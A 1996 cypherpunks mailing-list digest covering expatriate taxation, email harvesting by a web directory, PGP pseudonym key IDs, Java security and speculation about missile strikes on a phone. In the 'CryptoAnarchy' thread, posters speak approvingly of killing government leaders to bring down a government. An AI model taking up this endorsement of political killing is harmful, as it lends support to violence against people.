majority of personal taxes are paid by the rich and high-end upper-middle.
So I'll eat my words and agree with you, talking about the rich makes
quite a bit of sense. I sort of do wonder how many of those "corporations"
are small businesses and individuals working as companies. Time for me to
go find a national stats book. 

Of course only talking about the rich makes things so much easier.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Apr 1996 16:06:04 +0800
To: cypherpunks@toad.com
Subject: Nando.net on expatriate tax issue
Message-ID: <01I43CGVYKGW8Y53DN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Of course, the mainstream media is failing to question why such taxes
should be in existence at all.
	-Allen

>Billionaires' tax loophole could complicate passage of health reform
>---------------------------------------------------------------------------
>Copyright 1996 Nando.net
>Copyright 1996 The Associated Press

>WASHINGTON (Apr 28, 1996 1:47 p.m. EDT) -- A once white-hot, but still
>smoldering, partisan dispute over taxation of expatriate billionaires could
>further complicate enactment of a popular measure making health insurance
>portable from job to job.

[...]

>But an effort to plug a loophole that's allowed a handful of wealthy people
>to avoid taxes by renouncing their citizenship could put another hurdle
>before a health bill all sides say they want.

>Competing expatriate billionaire provisions are tucked into separate health
>bills that cleared the Senate last week and the House in March.

>In an approach recommended by the Clinton administration, the Senate would
>impose an immediate capital gains tax on the assets of wealthy people when
>they renounce their citizenship.

>However, the House bill, crafted by Ways and Means Chairman Bill Archer,
>R-Texas, takes an entirely different approach that Democrats and the
>administration say leaves the loophole wide open.

>House and Senate lawmakers haven't met yet to work out the differences
>between the two health bills. But if past negotiations on the expatriation
>issue are any indication, the House version will emerge victorious.

[...]

>Instead of imposing a large and immediate tax on wealthy citizenship
>renouncers, the House version tightens current law. It requires expatriates
>with a net worth of $500,000 or more to pay taxes on capital gains and
>other income from U.S.-based assets for 10 years after they renounce their
>citizenship.

>But critics say it will accomplish little more than forcing accountants and
>lawyers to find more creative ways around the rules on behalf of
>billionaire citizenship renouncers such as Campbell soup fortune heir John
>Dorrance III and Dart Container Corp. President Kenneth Dart.

>The House version would be extremely difficult to enforce and would allow
>patient expatriates to avoid the tax by holding their assets for 10 years
>before selling, they say. In the interim, they could raise cash by
>borrowing against the assets.

[...]

>However, Archer says his committee's version is actually tougher. The
>administration's proposal would create an incentive for people who had
>recently inherited their wealth to expatriate before their newly acquired
>assets started to appreciate, he said.

>"The reality is their proposal is weaker than ours," Archer said. "Some of
>the most egregious cases are where there have been heirs that have been
>recipients of estates who can under their proposal leave and never pay
>anything."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Mon, 29 Apr 1996 11:35:34 +0800
To: cypherpunks@toad.com
Subject: Re: Cell Kill 2
In-Reply-To: <199604280339.XAA07392@pipe2.nyc.pipeline.com>
Message-ID: <Pine.HPP.3.91.960428210130.10419A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



>On April 21, two Russian laser-guided missiles
>reportedly zeroed in on the cellular phone of Dzhokhar
                             ********
--------------

>he spoke to a Russian parliamentarian on a satellite phone.
                                            *********

Now, more interesting than whom he was talking to (who could
be a completely unknowing party to the events) is the issue
of what kind of phone Dudayev was using. I somehow doubt
that the area he was operating from has a widely spread out
cellular net. And cellular targeting might not be accurate
enough for this application of force. It makes more sense if
he was using a direct (mobile) phone-satellite device, assuming
such devices are emitting a stronger signal that could easily
be targeted by AWAC type technology, or even satellites (that
they are communicating with in the first place).

Coming so soon after it was reported that the US had decided
(still) that the war down there is an internal Russian affair,
all but giving them a go for a total solution, the possibility
of US involvement has to be contemplated. But I guess the
Russians might have enough capabilities by themselves to
orchestrate a stunt like this.

That the involved weaponry was laser guided might be misinformation.
Why not microwave signal guided? (I don't know what I'm talking about
here, of course. Perhaps satellite phones even implement GPS and
just tell where they are??).


Asgaard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: icodesupport@ipro.com
Date: Mon, 29 Apr 1996 20:37:24 +0800
To: cypherpunks@toad.com
Subject: Your I/CODE
Message-ID: <199604290703.AAA12624@amperage.ipro.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for registering.  Your I/CODE is:

	adct0524.

Please write it down since it will be useful at other WWW sites.

Please note that the first four chracters of your icode are letters, and the rest and numbers...sometimes they look the same.  Also, if you have chosen to protect your I/CODE with a password, our technical support staff will not be able to reveal your I/CODE or your personal information to you unless you can supply that password.

Remember, as an I/CODE member, you get all these great benefits:

SAVE TIME:

You now have a password that will allow you to bypass registration forms at I/CODE-Accepting sites all over the Web.

THE RED CARPET TREATMENT

Your I/CODE is like a backstage pass to the best of the Web.  When you use it, sites will give you access to special content, easy entry into sweepstakes, and more.

IT'S FREE:

Your I/CODE is free, and using it is free.  Forever.  Period.

MORE INFO:

For more information on I/CODEs, I/CODE benefits, and I/CODE sites, please visit the I/CODE Home Page at http://icode.ipro.com

Thanks again for your interest, and GO! I/CODE!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gus <angus@bmsysltd.demon.co.uk>
Date: Mon, 29 Apr 1996 17:17:14 +0800
To: cypherpunks@toad.com
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.OSF.3.91.960427180844.11803B-100000@bud.peinet.pe.ca>
Message-ID: <Pine.LNX.3.91.960428235747.1082B-100000@bmsysltd.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Sentiono Leowinata wrote:

> I wonder how they can get the e-mail address? Our finger daemon are 
> blocked. Many un-broadcast e-mail addresses (the account never send any 
> e-mails to anyone) are in the database. How?

It's a sad fact that many unscrupulous(sp?) writers of WWW pages use 
non-visilble "on load" HTML to record what the web browser thinks the 
email address of the person browsing the page, and, I presume sell this 
info to the junk email producers.

Part of the WhoWhere archives could have come from such sources. (personally 
my address in netscape is stop.stealing@addresses.you.CENSORED)

If one really set ones mind to it, I guess that grepping through mailing 
list archives for addresses, and using a webcrawler to search for MAILTO=
would lead to many thousands, or even hundreds of thousands, of addresses.

On the plus side, the search engine will not let "*","\*","?*" and so be 
used, and there are no real matches for "root", apart from stuff like 
"Bob Root" etc.

--
Gus <angus@bmsysltd.demon.co.uk> |-|PGP Fingerprint = 73 83 C0 EA 2E A6 00 3E
http://www.thepulse.co.uk/angus  |=|(Key on request)  08 B1 19 0D 8B BE 87 B9
CIS 100545.720                   |+| "Linux - You know you want to." | "fuck"
|Advertising/Promotional email will result in a campaign of hatred and abuse|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 16:47:02 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <m0uDagf-00093GC@pacifier.com>
Message-ID: <Pine.SUN.3.93.960428234342.5923A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, jim bell wrote:

[...]

> "Military technologies" only work effectively against a military target.  

While generally I agree with you, I believe Esper Sata, Gerald Bull and
Pablo Escobar might have more specific disagreements.

> Kill civilians and you just make other civilians angry.  At that point 
> they'll be look for a weapon that "military technologies" cannot effectively 
> oppose.  That weapon is already known to be possible.  

While strong cryptography is powerful, and secure communications
liberating, unplugging the phones would about cripple that 'weapon' for a
while.  Any group rebelling based only on high technology communication is
an extremely vulnerable group, both to widespread denial of service, and
more specific 'surgical' attacks.  (Motorola stock anyone?)

> Quite the contrary, I think that a "successful popular uprising" will 
> require only a very small investment in time and money, in which some of 
> they key players in government are targeted and the prospect exists for 
> easily and cheaply getting the rest.  At that point they will resign in
> droves.

Firstly, uprising, even kicking people out of power might take only a
small investment in time and money, but consolidating a new system (even a
decentralized one) will be extensively expensive and time consuming.

To the extent that a successful uprising depends on organizing the new
power structure, I can't see how a successful popular uprising can be
cheap.

In addition I believe the assumption that a few, even several official
deaths will cause mass resignations ignores history.  See e.g., Columbia,
South Africa, and any number of other examples.

[...]

> Government feeds on its own size; once government is dramatically reduced 
> below its current size, it will become even less able to resist further 
> contraction.  Probably few government employees realize this.

While I understand the point, I think that a slim efficient government is
much better able to resist "contraction."  The most effective covert
action/terrorist/political agitation groups have all been small and
closely held.  It's easier to control all aspects of operation and a
greater concentration can be put into internal security concerns as
government shrinks.  Obviously there is a critical mass, but I don't think
you will see the "runaway refrigerator" effect with government shrinkage.

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Mon, 29 Apr 1996 22:34:42 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: PGP and pseudonyms
In-Reply-To: <Pine.GUL.3.93.960428201204.13032R-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSF.3.91.960429000141.11364B-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> > I suppose a temporary fix would be to not use an ordinary PGP passphrase,
> > but rather encrypt the whole secring.pgp file. Decrypt it when you need
> > it, and be very careful to properly clean up when you're done.
> Huh?
> Just use multiple secring.pgp files, and toggle PGPPATH. What's the
> problem? 

You don't understand the problem we're concerned about... The problem is,
the "real" person is in posession of the pseudonym's secret PGP key, and 
PGP doesn't try to hide that fact.

Suppose John Doe is using the pseudonym "Evil Bastard". Naturally, he has
a PGP key for his Evil Bastard identity. Now suppose someone gets into his
computer. This person would be able to find Evil Bastard's secret key. 
Fortunately, the snoop would not be able to use the key, since it would be
encrypted with a secure PGP passphrase. However, they would still be able
to use the command "pgp -kvv secring.pgp", and that shows the key ID of
each secret key. 

The key ID is the lower 64 bits of the public key, but it's included in
unencrypted form on the secret keyring as well, to identify the secret
key. The person who snooped the secret keyring would be able to see that
John Doe has the secret key with the ID of (for example) 13579BDF. Since
the ID of Evil Bastard's well-known public key is also 13579BDF, the snoop
now knows that John Doe is in posession of a secret key that corresponds
to Evil Bastard's public key, which proves that John Doe *IS* Evil Bastard. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 29 Apr 1996 23:53:33 +0800
To: Gunjan Sinha <gunjan@parsecweb.com>
Subject: ANNOUNCING The WhoWhere? Hack Stanford Contest!
In-Reply-To: <199604281351.GAA16852@parsecweb.com>
Message-ID: <Pine.GUL.3.93.960428224543.13032V-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


               FOR IMMEDIATE RELEASE ON CYPHERPUNKS
                A Publicly Available Announcement

Hey folks! A challenge. Using only legal and ethical means that would not
embarrass you at your IPO, and using only publicly available sources on
the Internet, please describe in detail how you found: 

1. Where and when "siockman@leland.stanford.EDU (Larry Schwimmer)"
   appeared in a publicly available source. NOTE: this is not Larry's
   real email address.
2. Where and when "sitn0001@leland.stanford.EDU (SITN Account 0001)"
   appeared in a publicly available source.
3. Robert Tharp's kerberos principal @ir.stanford.edu. Note: this nym
   has no email address or home directory, just a kerberos principal.
4. The current names and email addresses of all whowhere.com and
   parsecweb.com affiliates.

Employees of whowhere.com and their families are not eligible for prizes. 
Current and former affiliates of Stanford University are not eligible for
prizes, whether you use Stanford computers for the solution or not. You
must be able to demonstrate your solution from a private ISP such as
whowhere.com or netcom.com; solutions requiring other than publicly
available access to any major university's computer system will be
disqualified. To be eligible for prizes, I request that the source NOT be
made publicly available until I have had a chance to make it unavailable. 

A consolation prize may be awarded to the first person who identifies
whowhere.com's answers for challenges 1 and 2. This may not be the same
answer as was given above. 

Void where prohibited by law. Your mileage may vary. Trix are for kids.

On Sun, 28 Apr 1996, Gunjan Sinha <gunjan@parsecweb.com> wrote:

> I am sorry if you misunderstood my previous email. We are ex-Stanford
> grad, not current students!

I apologize for assuming that your message was written in standard
english, using the normal and customary (and publicly available) meanings
of words such as, "WhoWhere? is an effort by a team from Stanford GSB and
engineering school," and for assuming that the use of the Stanford name on
a number of publicly available web pages indicated an active Stanford
affiliation. In retrospect, I recognize that these were typographical
errors, just like the four glaring HTML bugs and handful of security holes
we've found so far (which are now publicly available information). 

Please take care to avoid such misunderstandings in the future by
refraining from introducing yourselves in these ways, especially where
such claims are likely to become publicly available information. 

> The WhoWhere? database is collected through
> a combination of technolofy, partnerships, and self-registrations by
> end-users.
> 
> Our content is from publicly available sources.

No, some of it is clearly not. Or if we do have such a serious security
breach, then Stanford is violating Federal laws concerning the privacy of
student records, and I would very much like to fix the problem, because I
do not wish to go to prison. As I asked you and your technical droid
before, please let me know how you obtained the "SITN Account" entries
without delay. If your selection of publicly available information
repositories is not considered publicly available information, then I
would be happy to sign a nondisclosure agreement. The fact that I have
signed such a nondisclosure agreement would, of course, become publicly
available information. 

Please identify the publicly available source that associates the name
Larry Schwimmer with the email address siockman@leland.Stanford.EDU. We
believe that this association only happened once, where it would not have
become publicly available information.

I have every hope that we will be able to settle this to our mutual
satisfaction privately. It sucks for everyone when disagreements such as
this become publicly available information.

Oh, there are some other problems with your site and its management, but
I'm sure you'll be able to find those problems, because they have been
posted as publicly available information. 

.signature publicly available





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 19:21:51 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Mindshare and Java
In-Reply-To: <Pine.GUL.3.93.960428165347.13032N-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.93.960429010905.8863A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, Rich Graves wrote:

> On Sun, 28 Apr 1996, Tom Weinstein wrote:
> > Rich Graves wrote:
> > >
> > > Some of the things a valid signature from Jack the Ripper means:
> 
> [True statements deleted]
> 
> > > 3. If I am Jack the Ripper, I have a way of proving that the code is
> > >    my intellectual property.
> > 
> > How do you prove that?  If I strip off your signature and sign it
> > myself, how do you know it's yours?
> 
> Hmm. Very interesting point. You would need to make the signature
> technology at least tamper-evident by embedding it "somehow," and
> recursing infinitely. Yup, sounds pretty impossible, so I'm sure
> somebody's going to come up with an answer. Maybe the one-time signature,
> or signatures authenticated by location.

I have put my 'secret' signature on work product by stegoing little things
into the text.  (A simple example would be if the first letter of each
sentence on each paragraph spelled your name).  I'm sure members of the
list can come up with any number of creative alternatives.

If this is done discretely enough and embedded "deep" enough into the
property, it is pretty reliable.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 19:43:50 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Nando.net on expatriate tax issue
In-Reply-To: <01I43CGVYKGW8Y53DN@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960429011537.8863D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, E. ALLEN SMITH wrote:

> 	Of course, the mainstream media is failing to question why such taxes
> should be in existence at all.
> 	-Allen
> 
> >Billionaires' tax loophole could complicate passage of health reform
> >---------------------------------------------------------------------------
> >Copyright 1996 Nando.net
> >Copyright 1996 The Associated Press

[...]

> >Instead of imposing a large and immediate tax on wealthy citizenship
> >renouncers, the House version tightens current law. It requires expatriates
> >with a net worth of $500,000 or more to pay taxes on capital gains and
> >other income from U.S.-based assets for 10 years after they renounce their
> >citizenship.

Uh.  Hmmmmm.

I refer you to section 877 of the current tax law.

(a)  In General.- Every nonresident alien individual who at any time after
March 8, 1965, and within the 10 year period immediately preceding the
close of the taxible year lost United States citizenship [unless he shows
non-tax avoidance intent with the burden on taxpayer to make such showing]
shall be taxable for such taxable year in the manner provided in
subsection (b)...

(b) Alternate Tax:

[Imposes the larger of normal taxation calculation and the calculation
with the source rules in (c)].

(c)  Special Rules of Source.- For purposes of subsection (b), the
following items of gross income shall be treated as income from sources
within the United States:

[Sale of real property or stocks and debt obligations]

(end)

In other words, you get taxed on capital gains and sale of stock or
property as well as real income for 10 years after your expatriation if
you cannot show you renounced citizenship for non-tax purposes.

What precisely does this reporter think is being "tightened" in his or her
version of the House bill?  (Note that in current law there is no $500,000
floor).  In fact the reporter hasn't bothered to describe what the
provision really does.  (Imposes a expatriation is taxable event
analysis).  Talk about a snow job.  I won't say it is or is not advertant,
but it's bloody annoying.


> >The House version would be extremely difficult to enforce and would allow
> >patient expatriates to avoid the tax by holding their assets for 10 years
> >before selling, they say. In the interim, they could raise cash by
> >borrowing against the assets.

Which is the law today.  What is with this guy?  Get your facts straight
media.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 30 Apr 1996 01:21:14 +0800
To: Gus <angus@bmsysltd.demon.co.uk>
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.OSF.3.91.960427180844.11803B-100000@bud.peinet.pe.ca>
Message-ID: <318492FE.6AF7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Gus wrote:
> 
> On Sat, 27 Apr 1996, Sentiono Leowinata wrote:
> 
> > I wonder how they can get the e-mail address? Our finger daemon are
> > blocked. Many un-broadcast e-mail addresses (the account never send any
> > e-mails to anyone) are in the database. How?
> 
> It's a sad fact that many unscrupulous(sp?) writers of WWW pages use
> non-visilble "on load" HTML to record what the web browser thinks the
> email address of the person browsing the page, and, I presume sell this
> info to the junk email producers.
> 
> Part of the WhoWhere archives could have come from such sources. (personally
> my address in netscape is stop.stealing@addresses.you.CENSORED)

  We go to great pains to keep from revealing your e-mail address to
a web site.  Several of the fixes in 2.01 were for these sorts of problems.
Given a current version of Netscape Navigator, how would a spam-king
steal your e-mail address from his web page?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Snow <snow@crash.suba.com>
Date: Tue, 30 Apr 1996 01:26:56 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Was Re: CryptoAnarchy: What's... Is now a long ramble.
In-Reply-To: <199604281221.AA01603@october.segno.com>
Message-ID: <Pine.LNX.3.91.960429021504.2417C-100000@crash.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



Oh god, I'd doomed. I think I am gonna wind up on Mr. Bells side in this 
one. 

Please also note that I am cc:ing this to an individual who is both more 
knowlegable about certain aspects of the following, and interested in 
certain aspects of this.

On Sun, 28 Apr 1996 mkj@october.segno.com wrote:
> Sandy Sandfort wrote:
> > Income tax is the Godzilla of taxes.  It is THE TAX when it comes
> > to the US.  (Perhaps VAT has a similar status elsewhere, but both,
> 
> Most other arguments put forth so far in this thread, about how people
> "won't stand for" certain government behaviors and so forth, I don't
> find convincing.  Modern military technologies, especially in the
> U.S., make the prospects of a sucessful popular uprising dubious.

	I strongly disagree with this. (Especially within the US) Modern 
Military technology doesn't have a lot to do with it. It is modern 
stratagies and tactics that make things difficult. In a "popular 
uprising" (in quotes because most aren't) an organized armed group will 
devistate(spelling?) a mob, and the technology necessary to do this is at 
least 30 years old. 
	Fine. So change the tactics. Instead of "Rising Up", simply use 
an ages old an respected solution. Take out the leaders. Note, I am _not_ 
suggesting Mr. Bells assination politics, rather, given a violent 
revolution, or the beginings of one, shorten it by taking those who make 
the policies you disagree with.
	The things is, you HAVE to wait until the violence breaks out, 
and you HAVE to do the job quickly, and take out as much of the 
leadership as possible, otherwise your job gets much more dificult. 

	I am digressing.

	My point is not to advocate such actions, only to argue that it 
isn't the TECHNOLOGY that is the problem, rather the strategy.  

> When you cut off someone's air supply, even the nicest, gentlest
> person will go into an unrestrained, murderous frenzy.  I expect
> something similar will happen to even the most "civilized" governments
> within the next few years, as popular crypto begins to cut off their
> money supply.  As I see it, only those relatively few citizens who can
> afford to flee will dare to resist.

	As a suggestion, and using your analogy, wouldn't it be better to 
either a) drug the person you are strangling so they don't notice, or to 
simply break their neck? (I.e. make it so they don't notice they are 
strangling until it is too late, if ever, or to do it so quickly that 
they don't have time to react? In this case I think the second would be 
the most difficult. 

> Which brings us to the "flight of capital" issue.  Will nations be
> able to compete freely for the loyalty of the rich?  Or will the most
> powerful nations form effective coalitions, and perhaps simply bomb
> "rogue" nations into the stone age?

	You might want to take a look at http://lois.kud-fp.si/nsk.
(Note, you must use a graphical browser)

	Has this been discussed before?

	This Nation/State called Neue Slowenische Kunst is issuing
passports to anyone who is a citizen. Citizenship is confered (apparently)
on anyone who is willing to agree to their "constitution". These passports
are being accepted (apparently, tho' I couldn't find the list of counties
that accept them.) I disagree quite strongly with MANY of the rules/laws
that their constituion establishes, but the idea interests me. 

New Slovenia isn't a (at this point my command of the language breaks
down, or maybe there isn't an exact word for it) State. Basically, it is a
Nation without borders, where citizenship is a matter of allegence rather
than geographical location/birth. I don't know a whole lot about it, as
those particular pages are entirely GIFs, and I am not a patient person. 

It got me to thinking (yeah, you probably saw the smoke). The idea that 
citizenship--or whatever it would be called--is based on things other 
than nationality (although NSK is a nationalist organization) is not new, 
but with (Cypherpunk tie in) the ability for people to communicate freely 
across borders, would it be possible set up something similar along 
other lines? 

/* 
Semantic Note: from this point on in this ramble, Nation will be used to
describe a political entity based on philosphical allegance ala NSK, and
State will be used to describe a geographically based political entity
*/

	It would be relatively easy to set up, but recognition/validity
would be a major difficulty (Understatement). Convincing others as to the 
necessity would be damn near impossible tho'. (I am starting to think of 
many many more obsticles. Law enforcement etc) 

	The major advantage would be the impossibility of convention (or 
nuclear) attack. Simply, no land, nothing for a military to take and 
hold. Then agression against this posited nation would either devolve 
into police actions on known "citizens" and/or economic "warfare". 
	Economic warfare would take place against National banks (ala 
a digital cash type system) by States refusing to allow certain National 
banks to convert currency in their jurisdiction. etc.
	
	The intersting possiblity lies in the taxiation realm. As it 
becomes easier and easier to hide income via anonymity, these Nations 
or at least their bank[s] could act as arbiters/agents in taxation, 
paying the states for services rendered based on their population in a 
given state. 
	Another possiblity: Seperation of Powers, the States deal with 
physical matters such as roads, parks etc. operating on Service based 
taxes (gas taxes for roads, entrance fees for Parks etc. VAT to pay for 
police & fire depts) and the Nations take care of economic interests such 
as financial security currency exchange etc. 

	I think I am going to be thinking about this for a while. 

> The more I contemplate my "simple" question of yesterday, the more I
> find myself getting into deep waters which I feel ill-equipped to
> navigate.  I rapidly run up against such imponderable questions as,
> "What is government?"  and "What is wealth, really?"  Only one thing
> is certain: We live in interesting times!

	Are these the deep waters you refer to?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Snow <snow@crash.suba.com>
Date: Tue, 30 Apr 1996 02:18:40 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <m0uDagf-00093GC@pacifier.com>
Message-ID: <Pine.LNX.3.91.960429032151.2417D-100000@crash.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, jim bell wrote:
> At 08:21 AM 4/28/96 -0400, mkj@october.segno.com wrote:
> >Although they will almost certainly try to extract as much as possible
> >from the poor, you can't get blood from a stone.  Hence the size of
> >U.S., make the prospects of a sucessful popular uprising dubious.
> 
> Quite the contrary, I think that a "successful popular uprising" will 
> require only a very small investment in time and money, in which some of 
> they key players in government are targeted and the prospect exists for 
> easily and cheaply getting the rest.  At that point they will resign in droves.

	Damnit, I KNEW I was gonna wind up agreeing with him. ;)

> avoid taxation, the vast increase in information communicated by the 
> Internet is taking a huge amount of power away from the traditional media, 
> backer of the government in most cases.  In addition, this information flow 
> is making it ever more difficult to pass abusive laws; if the government 

	On the contrary, just as the increased communications let 
opponents know about the legislation, it also lets the proponents know, 
and they supposedly send faxes and email in support. 

> does something stupid in the morning, by noon they are being flooded with 
> faxes and emails.  And the whole concept of having a "governement" tends to 
> be based on the assumption that people are incapable of making decisions for 
> themselves.  That's an increasingly unrealistic position.

	Literacy rates are dropping, the High School Dropout rates are on 
the rise. Hell, listen to talk radio for a while, and you tell me if 
these are the people YOU want running the country. They are motivated 
enough to call in and/or vote, but they aren't motivated enough to 
actually stop and think about the subject, much less learn about it. 
	I am not saying that the average person can't make good 
decesions, only that many of them are not equipped to sort out the 
complexites, nor are they willing to think long term about things. 
Unfortunately this is also true of our leadership. 

Petro, Chistopher C.
petro@suba.com <prefered>
snow@crash.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 29 Apr 1996 21:46:30 +0800
To: Gus <angus@bmsysltd.demon.co.uk>
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.LNX.3.91.960428235747.1082B-100000@bmsysltd.demon.co.uk>
Message-ID: <Pine.SUN.3.93.960429033853.11730B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Apr 1996, Gus wrote:

> On Sat, 27 Apr 1996, Sentiono Leowinata wrote:
> Part of the WhoWhere archives could have come from such sources. (personally 
> my address in netscape is stop.stealing@addresses.you.CENSORED)

You should remove the profanity and instead put something like 'capon' or
'dingleberry.'

This way perhaps they will publish the information or sell it to a client
who might actually complain.

> --
> Gus <angus@bmsysltd.demon.co.uk> |-|PGP Fingerprint = 73 83 C0 EA 2E A6 00 3E
> http://www.thepulse.co.uk/angus  |=|(Key on request)  08 B1 19 0D 8B BE 87 B9
> CIS 100545.720                   |+| "Linux - You know you want to." | "fuck"
> |Advertising/Promotional email will result in a campaign of hatred and abuse|

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Snow <snow@crash.suba.com>
Date: Tue, 30 Apr 1996 01:27:33 +0800
To: Asgaard <asgaard@sos.sll.se>
Subject: Re: Cell Kill 2
In-Reply-To: <Pine.HPP.3.91.960428210130.10419A-100000@cor.sos.sll.se>
Message-ID: <Pine.LNX.3.91.960429034239.2417G-100000@crash.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, Asgaard wrote:
> >On April 21, two Russian laser-guided missiles
> >reportedly zeroed in on the cellular phone of Dzhokhar
>                              ********
> --------------
> >he spoke to a Russian parliamentarian on a satellite phone.
>                                             *********
> 
> That the involved weaponry was laser guided might be misinformation.
> Why not microwave signal guided? (I don't know what I'm talking about
> here, of course. Perhaps satellite phones even implement GPS and
> just tell where they are??).

	Use radio trianglation, and have an operative "near by" paint the 
most likely spot with a laser. Send in the missles.

	AFAIK, the human eye/mind is still the quickest discrimination 
system around. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 30 Apr 1996 05:49:40 +0800
To: cypherpunks@toad.com
Subject: Former CIA Director and *Strategic Investment* Editor missing
Message-ID: <199604291106.EAA02347@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


CNN is reporting that Colby's canoe has been found on the Potomac and
Colby is missing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 30 Apr 1996 05:05:16 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: The Joy of Java
In-Reply-To: <199604290530.WAA25425@jobe.shell.portal.com>
Message-ID: <199604290929.EAA02285@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


[All of Hal's excellent post deleted]

Everyone on this list is shooting for military grade security, and Hal's 
just given us a lot of reasons why it's going to be hard to achieve that 
with Java applets.

I'm not sure that list proves that Java applets are completely unsuitable
for crypto applications, though.

I don't that the general public is ever going to have military grade 
security.  (I don't think I will either, for that matter.)  Most people 
don't have the discipline or the knowledge to use their tools properly.  
They'll pick weak passphrases, let other people have access to their 
computer, or not pay enough attention to plaintext disk residue.

"The best shouldn't be the enemy of the good."

The thing that's important is to set up workable and accssible systems
that are good under everyday (typical) use, and that don't impose many
limits on how secure individual users can make themselves.  Java applets 
and applications taken together could be good at that.

Most people probably pick weak PGP passphrases, and they probably don't
bother to edit the letters they intend to encrypt on a ramdisk.  But
